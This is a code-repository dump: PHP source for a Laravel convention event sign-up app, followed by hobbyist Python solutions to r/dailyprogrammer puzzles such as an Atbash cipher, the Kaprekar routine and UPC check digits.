<file_sep><?php
use Illuminate\Console\Command;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputArgument;
class userPassword extends Command {
/**
* The console command name.
*
* @var string
*/
protected $name = 'user:password';
/**
* The console command description.
*
* @var string
*/
protected $description = 'Reset password of a user.';
/**
* Create a new command instance.
*
* @return void
*/
public function __construct()
{
parent::__construct();
}
/**
* Execute the console command.
*
* @return mixed
*/
public function fire()
{
try
{
$email = $this->argument('email');
$password = $this->argument('password');
$user = Sentry::findUserByLogin($email);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
$this->info("Password for $email set to: $password");
}
else
{
$this->error('Password reset failed!');
}
}
else
{
$this->error('The provided password reset code is invalid!');
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
$this->error('User was not found!');
}
}
/**
* Get the console command arguments.
*
* @return array
*/
protected function getArguments()
{
return array(
array('email', InputArgument::REQUIRED, 'User email'),
array('password', InputArgument::REQUIRED, 'User password'),
);
}
/**
* Get the console command options.
*
* @return array
*/
protected function getOptions()
{
return array();
}
}
<file_sep><?php
class UsersController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex()
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$users = User::orderBy($sort, $order)->paginate(15);
return View::make('users.index', compact('users', 'sort', 'order', 'page'));
}
public function getShow($id)
{
try {
$user = User::findOrFail($id);
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', Lang::get('messages.not_found', array('model' => Lang::get('labels.user'))));
}
$fields = array();
$values = array();
if (ProfileField::all()->count() && $user->profileData->count())
{
$fields = ProfileField::whereHas('events', function($q) use (&$user)
{
$q->whereIn('con_event_id', $user->events()->lists('con_event_id'));
})->orderBy('sort_order')->get();
$allFields = ProfileField::all();
$fields = $allFields;
$values = array();
foreach($allFields as $field)
{
$field_data = $user->profileData()->where('profile_field_id', '=', $field->id)->first();
if ($field_data)
{
$values[$field->id] = array(
'value' => $field_data->value,
'visibility' => $field_data->visibility
);
}
}
}
return View::make('users.show', compact('user', 'fields', 'values'));
// return $id;
}
public function postEdit()
{
try {
$input = array_only(Input::all(), array('name', 'country_id'));
$validation = Validator::make($input, User::$rules);
if ($validation->passes())
{
$this->user->update($input);
foreach(Input::all() as $key => $value)
{
if (substr($key,0,5) === 'field' && substr($key,-10,10)!=='visibility')
{
$field = explode('_', $key);
$id = $field[2];
$data = array(
'user_id' => $this->user->id,
'profile_field_id' => $id,
'value' => $value,
'visibility' => Input::has($key.'_visibility') ? Input::get($key.'_visibility') : 'private'
);
if (!sizeof($this->user->profileData))
{
$profileData = ProfileData::create($data);
}
else {
try {
$field = $this->user->profileData()->where('profile_field_id','=', $data['profile_field_id'])->firstOrFail();
$field->update($data);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($data);
}
}
}
}
return Redirect::action('UsersController@getShow', array($this->user->id))->with('success', Lang::get('messages.update_success', array('model' => Lang::get('labels.user'))));
}
return Redirect::action('UsersController@getEdit')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', Lang::get('messages.update_error', array('model' => Lang::get('labels.user'))));
}
}
public function getEdit()
{
$countries = Country::formlist();
// $field_ids = ProfileField::all()->lists('id');
$user = $this->user;
$allFields = ProfileField::orderBy('sort_order')->get();
$fields = array();
$values = array();
if (ProfileField::all()->count() && $user->profileData->count())
{
$fields = ProfileField::whereHas('events', function($q) use ($user)
{
$q->whereIn('con_event_id', $user->events()->lists('con_event_id'));
})->orderBy('sort_order')->get();
$fields = $allFields;
$values = array();
foreach($allFields as $field)
{
$values[$field->id] = array('value' => '', 'visibility' => $field->visibility, 'set' => false);
$field_data = $this->user->profileData()->where('profile_field_id','=', $field->id)->first();
if ($field_data)
{
$values[$field->id]['value'] = $field_data->value;
$values[$field->id]['visibility'] = $field_data->visibility;
$values[$field->id]['set'] = true;
}
}
}
// dd($values);
return View::make('users.edit', compact('countries', 'fields', 'allFields', 'values', 'user'));
}
public function postPassword()
{
try {
$input = Input::except('_token');
$rules = array(
'old_password' => '<PASSWORD>',
'password' => '<PASSWORD>',
'password_confirmed' => '<PASSWORD>'
);
$validation = Validator::make($input, $rules);
if ($validation->passes())
{
if (!$this->user->checkPassword(Input::get('old_password')))
{
return Redirect::action('UsersController@getPassword')
->with('error', Lang::get('messages.wrong_password'));
}
if ($this->user->checkResetPasswordCode($this->user->getResetPasswordCode()))
{
if ($this->user->attemptResetPassword($this->user->getResetPasswordCode(), Input::get('password')))
{
return Redirect::action('UsersController@getShow', $this->user->id)
->with('success', Lang::get('messages.password_change_success'));
}
else
{
return Redirect::action('UsersController@getPassword')
->with('error', Lang::get('messages.password_change_error'));
}
}
else
{
return Redirect::action('UsersController@getPassword')
->with('error', Lang::get('messages.password_change_error'));
}
}
else {
return Redirect::action('UsersController@getPassword')
->withErrors($validation);
}
}
catch(Exception $e)
{
throw $e;
}
}
public function getPassword()
{
$user = $this->user;
return View::make('users.change_password', compact('user'));
}
}
<file_sep><?php
class MailController extends BaseController
{
public function getInvite()
{
$name = 'NAME';
$email = 'EMAIL';
$password = '<PASSWORD>';
return View::make('emails.auth.invite', compact('name', 'email', 'password'));
}
public function getReminder()
{
$name = 'NAME';
$email = 'EMAIL';
$code = 'CODE';
return View::make('emails.auth.reminder', compact('name', 'email', 'code'));
}
public function getReset()
{
$name = 'NAME';
$password = '<PASSWORD>';
return View::make('emails.auth.reset', compact('name', 'password'));
}
}
<file_sep><?php
class HomeController extends BaseController
{
public function index()
{
$today = Carbon::now()->startOfDay();
$tomorrow = $today->copy()->addDay();
$events = ConEvent::all();
$events_current = ConEvent::where('starts_at', '<', $tomorrow->toDateTimeString())
->where('ends_at', '>=', $today->toDateTimeString())
->get();
$events_future = ConEvent::where('starts_at', '>=', $tomorrow->toDateTimeString())->get();
$events_past = ConEvent::where('ends_at', '<', $today->toDateTimeString())->get();
if (Sentry::check())
{
// Session::flash('info', Lang::get('messages.enter_profile'));
}
return View::make('home.index', compact('events','events_current', 'events_future', 'events_past'));
}
}
<file_sep><?php
return array(
/*
|--------------------------------------------------------------------------
| Email localization strings
|--------------------------------------------------------------------------
|
| Strings to localize emails
|
*/
'subject' => array(
'reminder' => ':app Password Reminder',
'reset' => ':app Password Reset',
'invite' => ':app Invitation',
),
'body' => array()
);
<file_sep><?php
return array(
"profile" => "Profile",
"edit_profile" => "Edit Profile",
"change_password" => "<PASSWORD>",
"log_in" => "Log In",
"no_login" => "Never logged in",
"last_login" => "Last Login",
"log_out" => "Log Out",
"yes" => "Yes",
"no" => "No",
'name' => 'Name',
'email' => 'E-mail',
'password' => '<PASSWORD>',
'old_password' => '<PASSWORD>',
'new_password' => '<PASSWORD>',
'confirm_password' => '<PASSWORD>',
'country' => 'Country',
'no_country' => 'No country selected',
'countries' => 'Countries',
"select_country" => "Select Country",
"select_value" => "",
'event' => 'Event',
'hosts' => 'Hosts',
'cohosts' => 'Co-hosts',
'list' => 'List',
'capacity' => 'Capacity',
'activity_open' => 'Open for sign-up',
'starts_at' => 'Starts At',
'ends_at' => 'Ends At',
'location' => 'Location',
'home' => 'Home',
'description' => 'Description',
// Users
"user" => "User",
"users" => "Users",
"select_user" => "Select User",
"group" => "Group",
"groups" => "Groups",
"select_group" => "Select Group",
// Events
"events" => "Events",
"select_event" => "Select Event",
'events_empty' => 'No events',
"activity" => "Activity",
"activities" => "Activities",
"select_activity" => "Select Activity",
'activities_empty' => 'No activities',
'my_activities' => 'My activities',
'category' => 'Category',
'categories' => 'Categories',
'select_category' => 'Select category',
'categories_empty' => 'No categories',
"activity_category" => "Activity Category",
"activity_categories" => "Activity Categories",
"select_activity_category" => "Select Category",
'activity_categories_empty' => 'No activity categories',
"room" => "Room",
"rooms" => "Rooms",
"select_room" => "Select Room",
'rooms_empty' => 'No rooms',
"participant" => "Participant",
"participants" => "Participants",
"participants_empty" => "No Participants",
// Profile Fields
"field" => "Profile Field",
"fields" => "Profile Fields",
"venue" => "Venue",
"venues" => "Venues",
"select_venue" => "Select Venue",
'field_type' => 'Type',
// Field types
'type' => array(
'string' => 'Text',
'text' => 'Textfield',
'option' => 'Radio options',
'checkbox' => 'Checkboxes',
'select' => 'Select List',
'multi' => 'Multi-select List',
'relation' => 'Relation',
),
'rules' => 'Validation Rules',
'visibility' => 'Visibility',
'visibility_control' => 'User can set visibility',
'sort_order' => 'Sort Order',
'public' => 'Public',
'private' => 'Private',
'help' => 'Help',
'options' => 'Options',
'default' => 'Default',
'relation_table' => 'Relation Table',
'login' => 'Log In',
'remember_me' => 'Remember me',
'remind_me' => 'Remind me',
'forgot_password' => 'Forgot <PASSWORD>?',
'save'=> 'Save',
'created_at' => 'Created At',
'updated_at' => 'Updated At',
'data' => 'Data',
'events_future' => 'Upcoming Events',
'events_current' => 'Events Happening Now',
'events_past' => 'Past Events',
'to' => '–',
'color' => 'Color',
'text_color' => 'Text Color',
'schedule' => 'Schedule',
'all_rooms' => 'All rooms',
'unknown' => 'Unknown',
'attending' => 'Attending',
'not_attending' => 'Not attending',
'toggle_open' => 'Toggle open',
'open_event' => 'Open event',
'close_event' => 'Close event',
'signup_limit' => 'Sign-up Limit',
'search' => 'Search',
);
<file_sep><?php
class AdminConEventsController extends AdminBaseController {
/**
* ConEvent Repository
*
* @var ConEvent
*/
protected $event;
public function __construct(ConEvent $event)
{
$this->event = $event;
$this->breadcrumbs = array(
array('path' => '/admin', 'label' => 'Admin'),
array('path' => '/admin/events', 'label' => 'Events')
);
// Set up checker
$this->checkModel = 'ConEvent';
$this->checkMessage = 'messages.check_event';
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$events = $this->event->all();
$breadcrumbs = $this->breadcrumbs;
return View::make('admin.events.index', compact('events', 'breadcrumbs'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
return View::make('admin.events.create');
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = Input::all();
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$this->event->create($input);
return Redirect::route('admin.events.index');
}
return Redirect::route('admin.events.create')
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$event = $this->event->findOrFail($id);
return View::make('admin.events.show', compact('event'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$event = $this->event->find($id);
if (is_null($event))
{
return Redirect::route('admin.events.index');
}
return View::make('admin.events.edit', compact('event'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), '_method');
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$event = $this->event->find($id);
$event->update($input);
return Redirect::route('admin.events.show', $id);
}
return Redirect::route('admin.events.edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->event->find($id)->delete();
if (Request::ajax())
{
return json_encode(true);
}
else
{
return Redirect::route('admin.events.index')
->with('success', Lang::get('messages.destroy_success', array('model' => ucfirst(Lang::get('labels.event')))));
}
}
/**
* Toggles if event activities are open for sign up
* @param int $event Id of ConEvent to toggle
 * @param  string   $action Whether to open or close the event
* @return Response
*/
public function getToggleOpen($event, $action)
{
try
{
$open = ($action === 'open');
$message = $action === 'open' ? 'events.success_open' : 'events.success_close';
DB::table('activities')
->where('con_event_id', $event)
->update(array('open' => $open));
$return = Redirect::back()
->with('success', Lang::get($message) );
}
catch(Exception $e) {
return Redirect::back()
->with('error', $e->getMessage());
}
return $return;
}
}
<file_sep><?php
class AdminBaseController extends BaseController
{
/**
* Initializer.
*
* @return void
*/
public function __construct()
{
$this->title = 'Admin';
}
}
<file_sep>bacon ≈
=======
Booking Assistance for Cons.
A system to sign up for events at conventions and conferences.
Built on [Laravel](http://laravel.com/), [Sentry](https://github.com/cartalyst/sentry) and [Twitter Bootstrap](http://getbootstrap.com/).
How to install
--------------
Clone this repo. You need [Composer](http://getcomposer.org/ "Get Composer") for the following steps.
Copy the example settings files in the `app/config/` directory:
`app.example.php` to `app.php`
`database.example.php` to `database.php`
`mail.example.php` to `mail.php`
Set up a database and make the necessary settings in the files above.
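For reference, a minimal `app/config/database.php` in the standard Laravel 4 format might look like this — the host, database name, and credentials below are placeholders to replace with your own values:

```php
<?php

// Minimal sketch of app/config/database.php (Laravel 4 format).
// All connection values below are placeholders — use your own.
return array(
    'default' => 'mysql',
    'connections' => array(
        'mysql' => array(
            'driver'    => 'mysql',
            'host'      => 'localhost',
            'database'  => 'bacon',
            'username'  => 'bacon',
            'password'  => 'secret',
            'charset'   => 'utf8',
            'collation' => 'utf8_unicode_ci',
            'prefix'    => '',
        ),
    ),
);
```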
Copy the example localization file in the `app/lang/en/` directory:
`app.example.php` to `app.php`
Set the name for your app if you want to.
From the command line, run the following commands in your root directory:
`composer install`
`php artisan migrate --package=cartalyst/sentry`
`php artisan config:publish cartalyst/sentry`
`php artisan migrate`
`php artisan db:seed`
To create your first administrator user, run the following command in your root directory, substituting the `<values>` with your own:
`php artisan user:create <email> <password> <name> Admin`
Example:
`php artisan user:create <EMAIL> topsecret "<NAME>" Admin`
Copy `example.htaccess` to `.htaccess` and make any necessary changes to reflect your environment.
Set up a virtual host or similar local server, and you're ready to go!
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class PivotConEventProfileFieldTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('con_event_profile_field', function(Blueprint $table) {
$table->increments('id');
$table->integer('con_event_id')->unsigned()->index();
$table->integer('profile_field_id')->unsigned()->index();
$table->boolean('required')->default(false);
// $table->foreign('con_event_id')->references('id')->on('con_events')->onDelete('cascade');
// $table->foreign('profile_field_id')->references('id')->on('profile_fields')->onDelete('cascade');
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('con_event_profile_field');
}
}
<file_sep><?php
class AdminController extends BaseController
{
public function getIndex()
{
return View::make('admin.index');
}
// public function getUsers($id = null)
// {
// $user = User::find($id);
// if ($user) {
// dd($user);
// return View::make('admin.users.edit', compact('user'));
// }
// else {
// $users = User::all();
// return View::make('admin.users.index', compact('users'));
// }
// }
public function getEvents()
{
return View::make('admin.index');
}
}
<file_sep><?php
class ConeventsTableSeeder extends Seeder {
public function run()
{
// Uncomment the below to wipe the table clean before populating
// DB::table('conevents')->truncate();
$conevents = array(
);
// Uncomment the below to run the seeder
// DB::table('conevents')->insert($conevents);
}
}
<file_sep>$(function() {
var $profileFieldForm = $('.form-profileField');
var onStartsAtChange = function onStartsAtChange(event) {
var $ends_at = $('input[name="ends_at"]');
if ($ends_at && $ends_at.val() === '') {
$ends_at.val($(this).val());
}
};
var onDestroyClick = function onDestroyClick(event) {
event.preventDefault();
var $this = $(this),
post_url = $this.attr('href'),
done_url = post_url.replace(post_url.substr(post_url.lastIndexOf('/')), '');
if (confirm(options.lang.confirmDelete))
{
$.ajax({
'url': post_url,
'type': 'post',
data: {
'_method': 'DELETE'
}
})
.done(function(data) {
document.location.href = done_url;
});
}
};
$('a.destroy').on('click', onDestroyClick);
$(".datepicker").datetimepicker({
'dateFormat':'yy-mm-dd'
});
$('input[name="starts_at"]').on('blur', onStartsAtChange);
if ($profileFieldForm.length) {
var $type = $('#type'),
$altFields = $('#field-options, #field-default, #field-relation_table'),
$fieldOptions = $('#field-options'),
$fieldDefault = $('#field-default'),
$fieldRelationTable = $('#field-relation_table'),
onTypeChange = function onTypeChange(event) {
$altFields.toggleClass('hidden', true);
switch ($type.val()) {
case 'relation':
$fieldRelationTable.toggleClass('hidden', false);
break;
case 'option':
case 'checkbox':
case 'select':
case 'multi':
$fieldOptions.toggleClass('hidden', false);
$fieldDefault.toggleClass('hidden', false);
break;
}
};
$type.on('change', onTypeChange);
onTypeChange();
$profileFieldForm.validate($.extend({}, options.validate, {
rules: {
name: {
required: true,
remote: {
url: options.url + "/admin/fields/check",
type: "post",
data: {
name: function() {
return $("#name").val();
},
old: function() {
return $("#_old_name").length ? $( "#_old_name" ).val() : '';
}
}
}
},
relation_table: {
required: 'select[name=type] > option[value=relation]:checked'
},
options: {
                required: 'select[name=type] > option[value=option]:checked, select[name=type] > option[value=checkbox]:checked, select[name=type] > option[value=select]:checked, select[name=type] > option[value=multi]:checked'
}
}
}));
}
});
|
9b2be0e50e9ee149280cab57e28052902f9f7b17
|
[
"Markdown",
"JavaScript",
"PHP"
] | 52 |
PHP
|
olleolleolle/bacon
|
a0abedd5753458ae8ed25c26821bed6646bfb48e
|
76a21fa14536c9e875be89714cd8d9b8e88f0cf1
|
refs/heads/master
|
<repo_name>Jy411/Dailies<file_sep>/#254 - Atbash Cipher [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/45w6ad/20160216_challenge_254_easy_atbash_cipher/
import string
def initAlphabetDict():
i = 1
alphabetBook = dict()
for alphabet in string.ascii_lowercase:
alphabetBook[i] = alphabet
i += 1
print(alphabetBook)
return alphabetBook
def encrypt(line):
alphabets = initAlphabetDict()
lineList = list(line)
encryptedString = ""
x = ' '
print(lineList)
for char in lineList:
if char == ' ':
encryptedString += x
for currKey, alphabet in alphabets.items():
            if char == alphabet:
newChar = alphabets[27 - currKey]
encryptedString += newChar
print(encryptedString)
encrypt('foobar')<file_sep>/#360 - Find The Nearest Aeroplane [Intermediate].py
# https://www.reddit.com/r/dailyprogrammer/comments/8i5zc3/20180509_challenge_360_intermediate_find_the/
from opensky_api import OpenSkyApi
from scipy.spatial import distance
EIFFEL = (48.8584, 2.2945)
JFK = (40.6413, -73.7781)
api = OpenSkyApi()
states = api.get_states()
dist_Eiffel, dist_jfk = [], []
for s in states.states:
    origin, callsign, identifier, geo_altitude = s.origin_country, s.callsign, s.icao24, s.geo_altitude
latitude, longitude = s.latitude, s.longitude
if latitude and longitude:
distanceFromEiffel = distance.euclidean(EIFFEL, (latitude, longitude))
distanceFromJFK = distance.euclidean(JFK, (latitude, longitude))
dist_Eiffel.append((distanceFromEiffel, origin, callsign, identifier, geo_altitude))
dist_jfk.append((distanceFromJFK, origin, callsign, identifier, geo_altitude))
print("Closest to the Eifel Tower:", min(dist_Eiffel, key=lambda f: f[0]))
print("Closest to JFK:", min(dist_jfk, key=lambda f: f[0]))<file_sep>/#294 - Rack Management 1 [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/5go843/20161205_challenge_294_easy_rack_management_1/
# Did not do bonuses
def scrabble(rackTiles, controlWord):
rackTiles = list(rackTiles)
controlWord = list(controlWord)
constructedWord = list()
for letter in controlWord:
for tile in rackTiles:
if letter == tile:
constructedWord.append(letter)
rackTiles.remove(tile)
controlWord = ''.join(controlWord)
constructedWord = ''.join(constructedWord)
if controlWord == constructedWord:
print('true')
else:
print('false')
scrabble("orrpgma", "program")<file_sep>/#76 - Title Case [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/wjzly/7132012_challenge_76_easy_title_case/
def titlecase(input, exception):
words = input.split()
output = [words[0].title()]
for word in words[1:]:
if word.lower() in exception:
output.append(word.lower())
else:
output.append(word.title())
return ' '.join(output)
print(titlecase("This is a hard one", "hard"))<file_sep>/#228 - Letters in Alphabetical Order [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3h9pde/20150817_challenge_228_easy_letters_in/
def letterSort(letter):
unorderedLetter = list(())
for char in letter:
unorderedLetter.append(char)
orderedLetter = unorderedLetter.copy()
orderedLetter.sort()
reversedLetter = unorderedLetter.copy()
reversedLetter.sort(reverse=True)
if unorderedLetter == orderedLetter:
print(letter + " IN ORDER")
elif unorderedLetter == reversedLetter:
print(letter + " IN REVERSE ORDER")
else:
print(letter + " NOT IN ORDER")
wordList = ["billowy", "biopsy", "chinos", "defaced", "chintz", "sponged", "bijoux", "abhors", "fiddle", "begins",
"chimps", "wronged"]
for word in wordList:
letterSort(word)<file_sep>/#354 - Integer Complexity 1 [Easy] Not Optimized.py
# https://old.reddit.com/r/dailyprogrammer/comments/83uvey/20180312_challenge_354_easy_integer_complexity_1/
def findFactors(number):
factorList = list()
sumList = list()
for i in range(1, number + 1):
        if number % i == 0:
factorList.append(i)
for num in factorList:
for num2 in factorList:
result = num * num2
if result == number:
sumOfFactors = num + num2
if sumOfFactors not in sumList:
sumList.append(sumOfFactors)
print(number, "=>", min(sumList))
findFactors(4444445)<file_sep>/#287 - Kaprekar Routine [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/56tbds/20161010_challenge_287_easy_kaprekars_routine/
def largestDigit(digit):
numbers = list(map(int, str(digit)))
return max(numbers)
def descendingOrder(digit):
    numbers = list(map(int, str(digit).zfill(4)))  # pad to 4 digits so e.g. 999 is treated as 0999
    numbers.sort(reverse=True)
    s = [str(i) for i in numbers]
    result = int("".join(s))
    return result
def ascendingOrder(digit):
    numbers = list(map(int, str(digit).zfill(4)))
    numbers.sort()
    s = [str(i) for i in numbers]
    result = int("".join(s))
    return result
def kaprekarRoutine(descNum, ascNum):
    num = -1
    i = 0
    while num != 6174 and num != 0:  # 0 only happens for repdigits, which never reach 6174
num = int(descNum) - int(ascNum)
ascNum = ascendingOrder(num)
descNum = descendingOrder(num)
print(num)
i += 1
print(i)
desc = descendingOrder(5455)
asc = ascendingOrder(5455)
kaprekarRoutine(desc, asc)<file_sep>/#290 - Kaprekar Number [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/5aemnn/20161031_challenge_290_easy_kaprekar_numbers/
# int('') raised ValueError for 1-digit squares; the empty first half now defaults to 0
import math
def kaprekarNumbers(start, end):
for i in range(start, end+1):
num = int(math.pow(i, 2))
numList = [int(num) for num in str(num)]
print(i, numList, len(numList))
secondHalfIndex = int(len(numList)/2)
firstHalfVal = ""
secondHalfVal = ""
for val, digit in enumerate(numList):
if val < secondHalfIndex:
firstHalfVal += "".join(str(digit))
if val >= secondHalfIndex:
secondHalfVal += "".join(str(digit))
print("first:", firstHalfVal, "second:", secondHalfVal)
        firstHalfVal = int(firstHalfVal) if firstHalfVal else 0  # empty for 1-digit squares
        finalVal = firstHalfVal + int(secondHalfVal)
        if finalVal == i:
            print(i, "is a Kaprekar number")
kaprekarNumbers(1, 55)<file_sep>/#243 - Abundant and Deficient Numbers [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3uuhdk/20151130_challenge_243_easy_abundant_and/
def numType(number):
divisors = list()
sumOfDivisors = 0
for x in range(1, number+1):
if number % x == 0:
divisors.append(x)
for num in divisors:
sumOfDivisors += num
    if sumOfDivisors < 2*number:
        print(number, "is deficient by", 2*number-sumOfDivisors)
    elif sumOfDivisors > 2*number:
        print(number, "is abundant by", sumOfDivisors-2*number)
    else:
        print(number, "is perfect (neither deficient nor abundant)")
test = [111, 112, 220, 69, 134, 85]
for num in test:
numType(num)
<file_sep>/#273 - Getting a degree [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/4q35ip/20160627_challenge_273_easy_getting_a_degree/
import math
import re
def conversionParser(inputString):
    values = re.findall(r"\d+\.\d+|\d+", inputString)
units = re.findall("[a-z][a-z]", inputString)
firstUnit = units[0][0]
secondUnit = units[0][1]
value = values[0]
if value.find("."):
return firstUnit, secondUnit, float(value)
else:
return firstUnit, secondUnit, int(value)
def converter(unit1, unit2, val):
    if unit1 == 'd':
        radianVal = math.radians(val)
        return str(radianVal) + " radians"
    elif unit1 == 'r':
        degreeVal = math.degrees(val)
        return str(degreeVal) + " degrees"
    elif unit1 == 'c':
        if unit2 == 'f':
            fahrenheitVal = (val * 9/5) + 32
            return str(fahrenheitVal) + " fahrenheits"
        if unit2 == 'k':
            kelvinVal = val + 273.15
            return str(kelvinVal) + " kelvins"
        else:
            return "Invalid conversion units"
    elif unit1 == 'f':
        if unit2 == 'c':
            celsiusVal = (val - 32) * 5/9
            return str(celsiusVal) + " celsius"
        if unit2 == 'k':
            kelvinVal = (val - 32) * 5/9 + 273.15
            return str(kelvinVal) + " kelvins"
        else:
            return "Invalid conversion units"
    elif unit1 == 'k':
        if unit2 == 'c':
            celsiusVal = (val - 273.15)
            return str(celsiusVal) + " celsius"
        if unit2 == 'f':
            fahrenheitVal = (val - 273.15) * 9/5 + 32
            return str(fahrenheitVal) + " fahrenheits"
        else:
            return "Invalid conversion units"
conUnit1, conUnit2, currVal = conversionParser("90dr")
print(converter(conUnit1, conUnit2, currVal))<file_sep>/#370 - UPC Check Digits [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/a72sdj/20181217_challenge_370_easy_upc_check_digits/
def checkUPC(UPC_Code):
UPC_CodeList = list()
for num in UPC_Code:
UPC_CodeList.append(int(num))
evenNumSum = 0
oddNumSum = 0
for numIndex, num in enumerate(UPC_CodeList):
        if numIndex % 2 == 0:
evenNumSum += num
else:
oddNumSum += num
evenNumSum = evenNumSum * 3
finalSum = evenNumSum + oddNumSum
finalSum = finalSum % 10
    if finalSum != 0:
finalSum = 10 - finalSum
print(finalSum)
checkUPC("04210000526")<file_sep>/#238 - Consonants and Vowels [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3q9vpn/20151026_challenge_238_easy_consonants_and_vowels/
import random
def wordGenerator(cv):
vowels = ["a", "e", "i", "o", "u"]
consonants = ["b", "c", "d", "f", "g", "h", "j", "k", "l", "m", "n",
"p", "q", "r", "s", "t", "v", "w", "x", "y", "z"]
string = list(cv)
newString = ""
for character in string:
if character == 'c':
newString += random.choice(consonants)
elif character == 'C':
newString += (random.choice(consonants)).upper()
elif character == 'v':
newString += random.choice(vowels)
elif character == 'V':
newString += (random.choice(vowels)).upper()
print(newString)
userInput = input("Enter a string(c and v): ")
wordGenerator(userInput)<file_sep>/#272 - What is in the bag [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/4oylbo/20160620_challenge_272_easy_whats_in_the_bag/
tileCount = {
'A': 9, 'B': 2, 'C': 2, 'D': 4, 'E': 12, 'F': 2, 'G': 3, 'H': 2, 'I': 9, 'J': 1, 'K': 1, 'L': 4, 'M': 2,
'N': 6, 'O': 8, 'P': 2, 'Q': 1, 'R': 6, 'S': 4, 'T': 6, 'U': 4, 'V': 2, 'W': 2, 'X': 1, 'Y': 2, 'Z': 1, '_': 2
}
def scrabbleTileCounter(tilesInPlay):
tilesInPlay = list(tilesInPlay)
print(tilesInPlay)
for tile in tilesInPlay:
tileCount[tile] = tileCount[tile] - 1
if tileCount[tile] < 0:
            print('Invalid Input. More', tile, '\'s have been taken from the bag than possible.')
exit()
output = {}
for tile, count in tileCount.items():
if count not in output:
output[count] = []
output[count].append(tile)
for key in sorted(output, reverse=True):
print("%s: %s" % (key, ', '.join(sorted(output[key]))))
scrabbleTileCounter('AXHDRUIOR_XHJZUQEE')<file_sep>/#343 - Mozarts Musical Dice [Intermediate] NOT DONE.py
# https://www.reddit.com/r/dailyprogrammer/comments/7i1ib1/20171206_challenge_343_intermediate_mozarts/
import random
musicComposition = open("mozart.txt")
measureList = list()
for line in musicComposition:
line = line.replace("\n", "")
measureList.append(line)
print(measureList)
groupOfMeasures = [measureList[i:i + 3] for i in range(0, len(measureList), 3)]
for group in groupOfMeasures:
print(group)
choice = random.randrange(len(measureList))  # randint(0, len) could index past the end
<file_sep>/#79 - Counting Steps [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/wvc21/7182012_challenge_79_easy_counting_in_steps/
import math
def step_count(a, b, step):
difference = b - a
count = difference/(step-1)
numList = []
for i in range(step):
numList.append(a + (i*count))
    return numList
print(step_count(13.50, -20.75, 3))<file_sep>/#372 - Perfectly Balanced [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/afxxca/20190114_challenge_372_easy_perfectly_balanced/
def isBalanced(userInput):
userInput = list(userInput)
x = 0
y = 0
for char in userInput:
        if char == 'x':
            x += 1
        if char == 'y':
            y += 1
    if x == y:
return True
else:
return False
print(isBalanced("yyxyxxyxxyyyyxxxyxyx"))<file_sep>/#239 - A Game of Threes [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3r7wxz/20151102_challenge_239_easy_a_game_of_threes/
def gameOfThrees(number):
while number != 1:
if number % 3 == 0:
print("%d 0" % number)
elif number % 3 == 1:
print("%d -1" % number)
number -= 1
elif number % 3 == 2:
print("%d 1" % number)
number += 1
        number = number // 3  # integer division keeps the printed values whole
print(number)
userNum = int(input("Enter a number: "))
gameOfThrees(userNum)<file_sep>/#236 - Random Bag System [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3ofsyb/20151012_challenge_236_easy_random_bag_system/
import random
def tetrisPieces():
    pieces = ["O", "I", "S", "Z", "L", "J", "T"]
    finalOutput = ""
    while len(finalOutput) < 50:
        random.shuffle(pieces)  # refill the bag: one shuffled copy of every piece
        finalOutput += ''.join(pieces)
    finalOutput = finalOutput[:50]
    print(finalOutput)
    return finalOutput
def verify(inp):
    for i in range(1, 8):
        chunk = inp[7 * (i - 1):7 * i]
        # a valid bag chunk contains no repeated pieces
        if len(set(chunk)) != len(chunk):
            print('repeat in chunk', i, ':', chunk)
        else:
            print('chunk', i, 'ok:', chunk)
verify(tetrisPieces())<file_sep>/#240 - Typoglycemia [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/3s4nyq/20151109_challenge_240_easy_typoglycemia/
import re
import random
def typo(sentence):
